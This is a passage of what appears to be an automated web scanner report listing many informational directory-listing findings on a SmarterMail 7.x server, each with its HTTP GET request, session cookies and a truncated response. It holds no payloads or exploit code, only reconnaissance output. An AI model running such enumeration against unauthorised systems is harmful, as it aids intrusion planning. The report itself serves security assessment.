Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Popup/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.12. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Portal/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Portal/

Request

GET /App_Themes/Default/CSS/Portal/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 2520
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Portal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.13. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Print/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Print/

Request

GET /App_Themes/Default/CSS/Print/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1381
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Print/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.14. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Reporting/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Reporting/

Request

GET /App_Themes/Default/CSS/Reporting/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1488
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Reporting/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.15. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Stats/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Stats/

Request

GET /App_Themes/Default/CSS/Stats/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1678
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.16. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Wizard/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Wizard/

Request

GET /App_Themes/Default/CSS/Wizard/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1476
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Wizard/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.17. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/

Request

GET /App_Themes/Default/Controls/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 2174
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.18. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Calendar/

Request

GET /App_Themes/Default/Controls/Calendar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1490
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.19. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Calendar/Img/

Request

GET /App_Themes/Default/Controls/Calendar/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 2758
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Calendar/">[To Parent Directory]</A>
...[SNIP]...

12.20. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Combobox/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Combobox/

Request

GET /App_Themes/Default/Controls/Combobox/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1402
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Combobox/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.21. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Common/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Common/

Request

GET /App_Themes/Default/Controls/Common/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1507
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Common/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.22. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Editor/

Request

GET /App_Themes/Default/Controls/Editor/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1876
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.23. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Editor/Img/

Request

GET /App_Themes/Default/Controls/Editor/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 4051
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:blac
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Editor/">[To Parent Directory]</A>
...[SNIP]...

12.24. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Grid/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Grid/

Request

GET /App_Themes/Default/Controls/Grid/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1485
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Grid/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.25. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Input/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Input/

Request

GET /App_Themes/Default/Controls/Input/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1398
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Input/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.26. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Spell/

Request

GET /App_Themes/Default/Controls/Spell/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1589
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.27. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Spell/Img/

Request

GET /App_Themes/Default/Controls/Spell/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 1854
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Spell/">[To Parent Directory]</A>
...[SNIP]...

12.28. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/TabStrip/

Request

GET /App_Themes/Default/Controls/TabStrip/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1591
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.29. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/TabStrip/Img/

Request

GET /App_Themes/Default/Controls/TabStrip/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 1724
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/TabStrip/">[To Parent Directory]</A>
...[SNIP]...

12.30. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Toolbar/

Request

GET /App_Themes/Default/Controls/Toolbar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1585
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.31. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Toolbar/Img/

Request

GET /App_Themes/Default/Controls/Toolbar/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 2094
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bla
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Toolbar/">[To Parent Directory]</A>
...[SNIP]...

12.32. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Window/

Request

GET /App_Themes/Default/Controls/Window/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
Content-Length: 1667
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.33. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/CssImg/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Window/CssImg/

Request

GET /App_Themes/Default/Controls/Window/CssImg/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 2305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/CssImg/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:b
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>
...[SNIP]...

12.34. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Window/Img/

Request

